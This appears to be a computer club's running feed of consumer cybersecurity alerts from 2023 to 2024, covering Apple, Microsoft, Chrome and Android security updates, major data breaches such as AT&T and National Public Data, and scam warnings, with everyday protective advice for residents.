Microsoft windows Patch Tuesday for December releases patch/fix for 71 vulnerabilities.
Of the 71 fixes one is actively being exploited and another has a CVSS score of 9.8!
Very highly recommended to apply both the December and November patch set for Windows 11 and Windows 10.
This 18.2 iOS and iPadOS 18.2 Update contains 21 Security related updates!
iOS 17.7.3 to address 14 Security flaws
iPadOS 17.7.3 macOS Sequoia 15.2 macOS Sonoma 14.7.2
macOS Ventura 13.7.2 watchOS 11.2 tvOS 18.2 visionOS 2.2
iOS18.2 feature list
iOS 18.2 brings several exciting new features and enhancements to your iPhone. Here are some of the highlights:
Apple Intelligence Enhancements: This update includes major improvements to Apple Intelligence, such as ChatGPT integration with Siri, allowing for more natural and conversational interactions.
Genmoji: Create custom emojis directly from your keyboard. You can describe the emoji you're looking for, and iOS will generate a new emoji based on your description.
Image Playground: Generate fun and playful images based on text prompts, concepts, and people from your photo library.
Visual Intelligence: Available on iPhone 16 models, this feature uses AI to analyze and understand what's around you through the camera.
Mail App Redesign: The Mail app has been redesigned for improved usability, allowing you to sort emails into multiple categories.
Find My Improvements: New options in the Find My app make it easier to locate lost items and share their location with others.
Volume Slider on Lock Screen: You can now add the volume slider back to your lock screen for easier volume control.
Major updates to Apple Products software today. November 19, 2024.
iOS 18.1.1, iPadOS 18.1.1, Sequoia 15.1.1 and others
UPDATE: Apple fixes/updates released today (November 19) address at least 2 vulnerabilities currently being exploited in the wild.
It is highly recommended to apply updates to any and all Apple devices for which updates are available. Initial reports of only Intel based Macs are thought to be untrue.
Details are scarce implying the threat is high.
The US banks reporting security breaches of debit cards:
Mainstreet Bank, Savers Bank, The Village Bank, Watertown Savings Bank, Webster Five Cents Savings Bank and Eagle Bank say some debit cards may have been compromised following a security breach at
a merchant's payment card platform.
Says Savers Bank,
“We have been notified by MasterCard International of a suspected security breach of a merchant’s network, transactions that may have compromised some of Savers Bank’s debit card numbers.”
Affected customers at Eagle Bank and Savers Bank will receive new cards automatically.
Webster Five Cents Savings Bank offers fewer details on the source of the breach, but says it’s also issuing mandatory new debit cards.
Watertown Savings Bank is asking customers to be vigilant, issuing new cards upon request.
“The breach included the capture of some of your personal information, such as your name and card number…
…we do ask that you remain vigilant on monitoring your account activity for the next 12 to 24 months and report any unusual or suspicious activity immediately. If you prefer that we issue a new card please contact the bank.”
Mainstreet Bank says the breach occurred “June 28, 2023 through April 26, 2024” and involved personally identifiable or protected data.
Serving American Monumental Life Insurance Company, Pellerin Life Insurance Company, American Benefit Life Insurance Company, Liberty Bankers Life Insurance Company, Continental Mutual Insurance Company, and Capitol Life Insurance Company.
Data compromised: names, addresses, dates of birth, social security numbers/tax identification numbers, driver’s license numbers/government-issued ID numbers, financial information such as credit card numbers, and medical and health insurance information.
Persons affected: individuals who at one time were a producer, policy-owner, insured, beneficiary, or payor for insurance policies which Landmark administered, or continues to administer, for Liberty Bankers Insurance Group.
Filings with the Texas and Maine attorneys general indicate 68,000 Texas affected.
This information gives scammers the ability to provide personal information that allows persons to trust the scammers.
Mozilla Firefox browser has issued an emergency update to address a zero-day vulnerability.
Firefox version 131.0.2 has this security update.
The vulnerability is in the Animation timelines with a CVSS of 9.8
Mozilla has applied this emergency fix to the Extended Support Release editions of Firefox and the Tor browser.
Firefox ESR 115.16.1, Firefox ESR 128.3.1 and Tor 13.5.7
The iOS upgrade from 18.0 to 18.0.1 has significant security issues and usability problems
Fidelity Investments reporting a data breach affecting 77,000 customers. The attack/breach occurred between August 17 and 19.
Not accounts - customer information according to Fidelity spokesperson. Could the customer information stolen be used to access their accounts?
Consider taking the normal safeguards and increasing vigilance.
Archive.org is the Internet's archive machine.
The Archive.org's user authentication database containing 31 million unique records has been hacked and added to Have i Been Pwned database.
The Archive.org site has been online and offline recently.
A possible DDoS attack.
The data stolen contains: email addresses, screen names, password change timestamps, hashed passwords, and other data.
Data indicates the data was stolen September 28, 2024.
Some minor fixes, BUT 2 security updates.
First, Apple says that iOS 18.0.1 fixes a bug where audio messages in the Messages app could have recorded “a few seconds of audio” before the orange microphone indicator was active in the Dynamic Island and Control Center. This bug only specifically impacted the iPhone 16, iPhone 16 Plus, iPhone 16 Pro, and iPhone 16 Pro Max.
Second, Apple says that iOS 18.0.1 and iPadOS 18.0.1 address a security issue where the VoiceOver feature could have read a user’s saved passwords aloud.
Also with security fixes:
watchOS 11.0.1
visionOS 2.0.1
macOS 15.0.1
Reportedly fixes some security issues, touch screen unresponsive, camera may freeze when recording macro mode video in 4K with HDR turned off, Messages may unexpectedly quit, performance may be impacted due to an issue with memory allocations on some iPhone models.
Security issues fixed: microphone access on iPhone 16, and fixes to Passwords app access in all supported iPhone models.
VoiceOver feature could have read a user's password aloud.
From the Computer Club's Help Center:
If you are using an email client (e.g., iPhone/iPad mail app, Microsoft Outlook, Thunderbird) and are unable to send/receive Outlook.com or Hotmail.com emails – surprise! – Microsoft has upgraded security for these email addresses and you must take the actions provided here:
If you are using eM Client, be sure to use the most recent version. You may have to delete and re-enter your Outlook/Hotmail account.
Make an appointment with the Help Center if you are unable to access your mail.
PrivateRecords.net
PrivateReports
People Searcher
ThePeopleSearchers
PeopleSearchUSA
MC2 Data database 2.2TB people’s data passwordless
On Internet 2.39,873 people
Names, email addresses, IP addresses, User agents,
encrypted passwords, partial payment information,
home addresses, DoB, phone numbers, property records,
legal records, family, relatives, neighbors data,
employment history
No Social Security numbers
CAPTCHs ae those popups: I am a Human or I am not a robot.
Attackers are now deploying fake CAPTCHAs to get victims to click.
We have done it before, many times. Kinda automatic now. We just want that game at a reduced price or an app we can't afford through vendor's stores.
This CAPTCHA copies a script, tricks the victim into copying then pasting this malicious script into a PowerShell window and executing that script.
The result of a successful execution of this malware load:
An infostealer to copy your passwords, password manager vault, cryptocurrency wallets.
In a statement from the Browser company, the Arc browser has a serious security flaw. Ensure your instance of the Arc browser has the August 26th update.
Slim CD is one of the credit card clearing houses that process credit card transactions for businesses.
Credit card processing takes special knowhow, techniques, insurance, trained staff, multiple redundant sites and hardware. So, businesses out source that portion of their businesses.
The attackers had access for over a year, but the data was stolen between June 14 and 15 of this year.
Full names, physical addresses, email addresses, credit card numbers, expiration dates. The CVV numbers were not reported stolen.
Slim CD has yet to offer IDentity theft protections nor credit monitoring services.
The breach notification: Slim CD Notification
https://cyberhoot.com/cybrary/identity-theft/
A little sales pitch, BUT valuable information.
Cyber criminals will use Innovis to open new accounts since all media cites the top 3.
Cyber incident in May of 2023 may have exposed personal information related to Medicare/Medicaid beneficiaries using Wisconsin Physicians Services Insurance Corporation.
Names, date of birth, SSN, mailing addresses, Medicare Beneficiary Identifiers, and related medical information were stolen as part of the ever evolving MOVEit issue.
Those affected should be notified soon and be issued a new CMS card and notice of the breach.
Version 128.0.6613.84/.85
Exploit in the wild. Chromium browsers should also issue updates very soon.
Very few details. Toyota confirms the data breach. Investigation ongoing.
Attackers claim: "Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data. We also offer you AD-Recon for all the target network with passwords."
Toyota:
"We are aware of the situation. The issue is limited in scope and is not a system wide issue,"
"engaged with those who are impacted and will provide assistance if needed."
Billions of personal information records published on the dark web and other venues. Data from non-public sources contain full names, names of relatives, full social security numbers, date of birth, physical addresses, etc.
You might wonder if your data or the data of a relative is one of those billions of records.
Some sites and companies are offering a tool to check.
BUT to check you have to provide the very data to those sites that you wish to check/search.
Consider your data is one or more of those billions of stolen records and those records are for sale or have been made available.
Mac users of 1Pasword version 8.10.36 are urged to apply a patch to prevent attackers from stealing entire password vaults.
“To exploit the issue, an attacker must run malicious software on a computer specifically targeting 1Password for Mac. An attacker is able to misuse missing macOS-specific inter-process validations to hijack or impersonate a trusted 1Password integration such as the 1Password browser extension or CLI.”
This would permit the malicious software to exfiltrate vault items, as well as obtain derived values used to sign in to 1Password, specifically the account unlock key and “SRP-𝑥”.”
Some Central Texas 9-1-1 call centers faced serious difficulties on Sunday(August 4 when callers and call-takers and difficulty hearing each other.
Austin and Lakeway were communicating with social media.
Capital Area Council of Governments - which operates the 9-1-1 systems announced later the threat was due to a cyber attack called a denial of service.
August 7, 2024
Apple releases updates to several platforms this evening.
iOS 17.6.1, iOS 16.7.10, iPad 17.6.1, iPadOS 16.7.10,
macOS Sonoma 14.6.1
The possibility for older devices receiving this important update from Apple may exist.
Apple statement: “This update includes important bug fixes and addresses an issue that prevents enabling or disabling Advanced Data Protection.”
However, Apple just updated iOS 10 17.6 last week and Apple rarely gives details on updates with a security element.
Worries me that iOS 16.7.10 also has an update.
National Public Data is a background check service. The service scrapes non-public sources to carry out background checks on billions of people.
Data collected includes SSN, full names, addresses, relatives, ...
This data was not given to National Public Data willingly or with convent/notice. Most victims will be unaware the data was collected, stored, or used at all.
The data stolen is being offered for sale: $3.5M.
A class action suit claims:
Negligence, breach of fiduciary duty and third-party beneficiary contract, and unjust enrichment.
Yet another reason to greatly increase awareness, vigilance, and communications to any and all.
HealthEquity - non-bank health savings trustee responsible for administrating HSA accounts reporting a massive data breach in March 2024.
Personal information that may have been accessed, but not limited to:
Name, Employee IDs, employers, addresses, phone numbers, social security numbers, dependent contact information.
4.3 million persons may be affected. Breach reported beginning of July. HealthEquity services HSA, FSA, HRA and 401K.
Affected persons should be notified beginning in August.
As with any data breach, increase vigilance, act quickly, REPORT.
Updates available for iOS 17.6, iPadOS 17.6, and Sonoma 14.6
iOS 15.8.3, iOS 16.7.9, iPadOS 16.7.9, Monterey 12.7.6, Ventura 13.6.8, watchOS 10.6, tvOS 17.6, visionOS 1.3
Only reported new features: News+ for home and lock screen.
Messages app ability to filter unknown senders if they are international numbers.
And bug fixes and security updates.
US Cybersecurity and Infrastructure Security Agency (CISA) urging people to update their Apple devices immediately.
Apple reports the problem with Private Relay for Safari on iDevices has been resolved.
Reported July 26 and lasting for 56 hours service was restored 10:59pm Eastern July 28.
iCloud Private Relay hides your Internet IP address for privacy and security.
The July 4, 2024 Cyber Security presentation recording mentioned the data breach at Evolve Bank and Trust. At the time of the report a sample set of the customer data appeared to be genuine. Ransom negations were known to be ongoing.
A recent posting on the dark web indicates a very large number of those customer records are available for sale.
Several firms that have worked with Evolve Band & Trust may have had their customer's data stolen and available for sale on the Dark Web as well. Affirm, Affirm Card, Wise, Bilt, Marqeta, Mercury, and EarnIg are a few examples. The data set reports 7,640,112 customers data to include but not limited to: name, SSN, bank account numbers, phone numbers, email addresses, ...
Please use extra caution, inform friends, family, neighbors.
Large global outages due to a software security update.
Yes, it is not only you. This can and did happen on a global scale.
The outage started 19:00 GMT July 18, 2024.
Major sites/businesses are down for a period of time until the affected machines can be physically visited, the root cause removed, and a reboot.
So, some time to resolve.
CrowdStrike update appears to be the root cause.
Major industry sectors are experiencing outages.
From hospital rumor: It might get worse. Take cash
The federal government is planning to change how people will login to access their social security accounts.
Current access via email/username and password will change to require a Login.gov or ID.me account.
The process is easy. If you have an existing Login.gov or ID.me account you can link your social security account.
If you do not, use your existing my SSN account and follow the detailed instructions to create either a Login.gov or ID.me account.
Then link your social security account.
More information:
https://blog.ssa.gov/changes-are-coming-to-how-you-access-social-securitys-online-services/
July 12 CNN Report
AT&T said the compromised data includes the telephone numbers of “nearly all” of its cellular customers and the customers of wireless providers that use its network between May 1, 2022 and October 31, 2022.
The data was the metadata: Phone numbers called, call duration, number of times called/messaged. But cell tower site identification records may have been released.
The FCC is investigating according to their social media posts on X (formerly Twitter).
This data breach is not related to the March 2024 incident (73 million customer's PII on the dark web).
Department of Justice delayed public disclosure. National Security and public safety concerns
An advisory/notice from AT&T:
https://www.att.com/support/article/my-account/000102979
I requested my information, got the response that day. Very little detail.
News services are reporting the hacker was paid about $300,000 to erase the data stolen.
The data was stolen from an unsecured cloud server. The stolen data was stored on a cloud server. Cloud servers do backups and replication. Consider the data still available. I easily requested my data. Anyone can request your data with a little effort. Use multi-factor authentication protections on accounts.
Some users in 98 countries may receive warnings on their iPhones of a potential for spyware loaded on their devices.
This the second such warning. Little is known of the need for this warning.
“Apple detected that you are being targeted by a mercenary spyware attack that is trying to remotely compromise the iPhone associated with your Apple ID -xxx-,”
A zero-click attack allowing the attacker(s) complete control of the device including reading encrypted messages and data.
If you are a high profile user or rely on encryption protections, consider Lockdown mode.
Turning your iPhone off nightly might be helpful.
Applying updates is now so important.
Microsoft Outlook. Outlook is Microsoft email system. Server, client, application. Part of several Microsoft subscriptions.
The vulnerability, tracked as CVE-2024-38021, allows an attacker to take control of the system it is running on, no user interaction, no authentication, full control, no click, remote code execution.
The vulnerability along with 142 others was patched with the July 9 Microsoft Patch Tuesday monthly security patch release. Thus very important to apply security updates. Recall June had a fix for the very critical Microsoft Windows wireless driver stack.
You may have other email systems/clients BUT outlook may be started as part of Windows startup.
A LARGE increase in attacks against iPhone and other devices recently (July 6 and since). has prompted Apple to release guidance to protect against this increase. Other technology and security companies are also warning customer and consumers.
With this LARGE increase of cyber activity you will receive warnings to change your password, move your money, and other common scams. LARGE increase. BE MORE AWARE. Some of those warnings are from the scammers/criminals.
The Computer Club's Special Interest Groups, Announcements, Wiki, emails provide information to help residents cyber safer. The Cyber Security SIG, Scams and Computer Safety, Internet of Things, MUG, Windows and other presentations are recorded and available.
Please use these and other resources. The NRO Anti-Fraud Group.
Not one more resident a victim of cyber crime!
Goggle issues Android patches on a monthly basis. For July one patch for CVE-2024-31320 is rated critical by Google.
Android updates are issued to all manufactures who use Android for their devices. Smartphones, smart tablets, TVs, streamers, etc.
Those manufactures then integrate the updates into their products, apply vendor specific updates, test, then release the update to their customers. Google Pixel and Samsung are quick to release.
Exploitation of this vulnerability could allow an attacker to take complete control of an android device.
Android 12 and 12L are most impacted, but the July Android update fixes 25 issues across the varied Android versions.
On Android: Settings > System or Software Update
Check for Updates
Follow instructions for the update
If not available, check again soon
For more information:
CDK Global is a software platform used by car dealerships.
As mentioned in the last Cyber Security SIG presentation, CDK Global suffered a cyber attack June 18. Then another the next day.GM, Nissan
CDK Global is urging customers of auto dealerships from GM, Nissan, and some BMW to not respond to requests for personal information or credit card numbers from attackers posing as CDK Global.
This vulnerability for the wireless protocol stack affects ALL versions of Microsoft Windows.
The vulnerability allows an attacker in close proximity to take over an unpatched Windows system. Any Windows version.
This vulnerability was patched with the June 11 Patch Tuesday update.
PLEASE use the updates for any and everything!!
The number of claimed victim companies of the Snowflake cloud provider data breach grows larger daily.
Confirmed victims (so far):
Ticketmaster
Santander
Reported victims:
Advanced Auto Parts
LendingTree & QuoteWizard
Alleged victims:
Allstate
Anheuser-Busch
Mitsubishi
Neiman Marcus
Progressive
State Farm
IDentity fraud is a more accurate description of the risks? IDentity theft - your identity is still there. IDentity fraud - others have access to your identity as well.
This item was covered in the Cyber Security SIG presentation June 6.
The NRO Anti-Fraud group, the Computer Club are attempting to make "Not one more Sun City resident" a realistic goal.
The new version numbers are 125.0.6422.112/.113 for Windows and Mac, and 125.0.6422.112 for Linux.
It is good advice to check browsers for updates daily or before any financial site transactions.
Apple released updates today for iOS and iPadOS 17.5.1 to fix the deleted photos issue.
This update provides important bug fixes and addresses a rare issue where photos that experienced database corruption could reappear in the Photos library even if they were deleted.
Apple releasing many updates today: 13-May-2024.
Updates to iOS 17.5, iPadOS 17.5, iPadOS 16.7.8, macOS 14.5.
Safari 17.5, iOS 16.7.8, macOS Ventura 13.6.7, macOS Monterey 12.7.5, watchOS 10.6, tvOS 17.5
New features and security updates.
Google releases updates to its Chrome browser to address several vulnerabilities.
"Google is aware that an exploit for CVE-2024-4671 exists in the wild,"
Users are recommended to upgrade to Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux to mitigate potential threats.
Browsers based on the Chromium engine will probably release their updates soon.
It is good practice to check for browser updates before use on any financial transactions.
The ransomware gang claiming responsibility for the UnitedHealth Group data leak has confirmed the data for sale on the Dark Web is indeed their data on their patients.
UnitedHealth group Change Healthcare is slowly gaining ground on backlogged payments to health providers.
"A ransom was paid as part of the company’s commitment to do all it could to protect patient data from disclosure" - UnitedHealth Group
The ransomware group, BlackCat/ALPH, pulled an exit move and left with the ransom. The claim of 6TB of patient and provider data has appeared and disappeared from the Dark Web site selling portions of that data.
UnitedHealth group is preparing to offer two-years of credit monitoring and identity theft protection to affected parties after the investigation.
“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America,”
More information here.
An advantage of data protection services, earlier warnings of data breaches.
Roku announced 500,000 accounts impacted by cyber attack discovered while investigating a data breach affecting 15,000 Roku accounts.
This second attack, a result of "credential stuffing" allowed attackers to make unauthorized purchases of hardware products and service subscriptions. Roku will reverse charges or refund to the affected accounts.
Roku has enabled two-factor authentication for all Roku accounts.
All 70+ million current and past AT&T customers who are known to have their data for sale may soon get the above email. If you still have the same email you gave AT&T.
The subscription code is for Experian IdentityWorks service.
We have covered Experian's privacy issues in past Cyber Security SIG recorded presentations.
AT&T had issues with the large amount of emails. Experian had issues with the large number of requests.
MalwareBytes has a Digital Footprint Scan:
https://www.malwarebytes.com/digital-footprint
This is a result you hope for:
In my testing the passwords/passphrases returned are accurate.
Google is not known for their privacy.
Their revenue stream comes from collecting data about us.
We know that!
BUT
Did you know you can use that collected data to your benefit also?
You can login to your Google account(s) and
1) Create an alert with search terms.
Social Security Number (requires verification)
Name(s)
Physical Addresses
Phone Numbers
Email Addresses
And get results (very disturbing results)
NOTE: The Password results. These are in the clear passwords available on the Dark Web we keep hearing about.
(More like grey web BUT ...)
Invest some time now. Let family, friends, neighbors, and members know.
Security updates for macOS 14.4.1, macOS Ventura 13.6.6, iOS 16.7.7, and visionOS 1.1.1 join the security patches to iOS 17.4.1 and iPadOS 17.4.1 released 21-Mar-2024.
These security updates fix vulnerabilities that could lead to arbitrary code execution. Thus important.
Updates to current iOS and iPadOS releases: 17.4.1
Updates to older releases iOS 15.8.2 iPadOS 16.7.2
This indicates to me these are security related.
Apple has stated iOS 17.4 updates due to comply with the EU DMA regulations. Those updates were released today March 5, 2024 a few days prior to the deadline.
However, the 17.4 iOS and iPadOS updates also addressed 2 major security flaws. Updates to iPadOS 16.7.6 and Safari 17.3.1 available now.
Consider these updates as urgent.
Data breach notification filed in Maine. Persons affected used Bank of America's deferred compensation plans.
The breach occurred at Infosys McCamish Systems.
“It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS.
According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”
WILLIAMSON COUNTY, Texas — Central Texas residents are being warned about a data breach that happened in 2022.
Officials said they discovered during an investigation that an unauthorized user gained access to an email account with a member of the 277th District Court in Williamson County, who then may have seen or taken certain information.
According to officials, certain people who interacted with the court on or before Nov. 10, 2022, may have their personal information impacted.
Sensitive information impacted varies by person but county officials said it could include names, addresses, Social Security numbers, and more. Officials also said they conducted a review of the attack and plan to reach out to those who may have been affected.
Cybersecurity experts said these types of attacks are not only happening more often but that government entities like Williamson County are also increasingly becoming the target of such attacks.
"Especially for the data that they have, we see that for multiple reasons," Mitchem Boles said. "But any type of data that's taken, according to Verizon's data breach investigation report from last year, 97% of those malicious actors are motivated by financial gain."
Boles also said these types of attacks can be accessed through emails easily when it comes to scam links and phishing fraud across the internet. He also says government agencies are seemingly being attacked more frequently.
"Because of older infrastructure. They're underfunded. They don't necessarily have the protections in place for their data, for their emails and for their users," said Boles. "We know that these kinds of attacks will only increase really in number and sophistication into 2024. So we don't see it slowing down."
KVUE reached out to Williamson County officials for more information, but we were told that no interviews would be conducted at this time.
If you think your identity has been stolen, you can place a credit freeze to stop anyone from creating a new credit account in your name.
The freeze can be placed by contacting any of the three major credit reporting agencies: Equifax, Experian or TransUnion. The request can be submitted online, by phone, or by mail.
UPDATE: reports to the Texas Attorney General's office claim 3,763 person's personal information exposed.
November 2022. Just now being informed.
Read the notification here.
Updates to fix bug of text may overlap while typing.
And the potential security related issues. The tell, updates to Sonoma and Safari to 17.3 on older Macs and iPads.
AT&T is starting to provide TruContact Branded Call Display.
A feature in partnership with TransUnion. The delivery to cell customers uses STIR/SHAKEN protocol to authenticate callers.
Callers need to register with TransUnion.
The incoming calls should display the companies logo, name, phone number and valid number.
The STIR/SHAKEN protocol uses asymmetric cryptography to validate the information displayed.
Only a very few companies are using TruContact Branded Call Display currently.
iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3
The updates are large:
12.43GB for macOS
5.62GB for iPadOS
Updates for iPadOS 16.7.5, tvOS 17.3, iOS 16.7.5, Monterey 12.7.3 and higher, iOS 15.8.1
WatchOS 17.3
And Safari 17.3
0-day vulnerability in WebKit 16Vulnerabilities
This slide from the Cyber Security SIG presentation 18-Jan-2024.
Google released Chrome updates today. CVE-2024-0519.
Updates to Chrome browser are encouraged
Chrome version 120.0.6099.224/225 for Windows.
macOS version 120.0.6099.234
120.0.6099.224 for Linux
ChromeOS 120.0.6099.235
In the Cyber Security presentation 4-Jan-2024 the new attack targeting Google session cookie reuse was cited.
Session cookies, if re-validated, allow attackers to logon to Google services without re supplying the password/authentication.
Not Good!
A just proposed mitigation: power cycle the device. A further step, sign-out of any/all browser profiles. Even more secure, reset your passphrase and sing-in again.
If you one of the few iPhone 17.3 beta testers:
A few are reporting major issues with the just released iOS 17.3 developer beta release. iPhone will loop indefinitely.
A few are reporting.
Update: Apple pulled iOS 17.3 beta due to reported problems.
